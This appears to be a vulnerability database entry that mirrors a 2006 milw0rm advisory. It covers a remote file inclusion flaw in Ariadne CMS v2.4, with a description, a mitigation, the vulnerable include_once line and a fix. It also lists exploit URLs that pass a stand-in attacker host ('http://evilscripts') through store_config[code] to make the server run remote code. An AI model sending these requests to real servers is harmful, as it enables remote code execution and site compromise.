Ariadne v2.4 (store_config[code]) Remote File Include Vuln

vendor:

Ariadne

by:

Cyber-Security.Org

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: Ariadne

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE: N/A

CPE: a:ariadne:ariadne

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Ariadne v2.4 (store_config[code]) Remote File Include Vuln

A vulnerability exists in Ariadne v2.4, which allows a remote attacker to include a file from a remote location. The vulnerability is due to the 'store_config[code]' parameter not properly sanitized before being used in an include_once() function call. This can be exploited to include arbitrary files from remote locations by passing a URL as the parameter value. Successful exploitation requires that 'allow_url_fopen' is enabled.

Mitigation:

Disable 'allow_url_fopen' and ensure that user input is properly sanitized before being used in an include_once() function call.

Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Ariadne v2.4 (store_config[code]) Remote File Include Vuln

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: Cyber-Security.Org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Version: 2.4

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Code: include_once($store_config['code']."modules/mod_debug.php");

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

F.X:

1- open files

2- add this code before wrong codes

require("../www/ariadne.inc");

3- save files

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

www.target.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://evilscripts ?
www.target.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://evilscripts ?
www.target.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://evilscripts ?
www.target.com/script_path/lib/includes/loader.web.php?store_config[code]=http://evilscripts ?


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Script Download: http://www.ariadne-cms.org/download/ariadne/ariadne.2.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2006-11-04]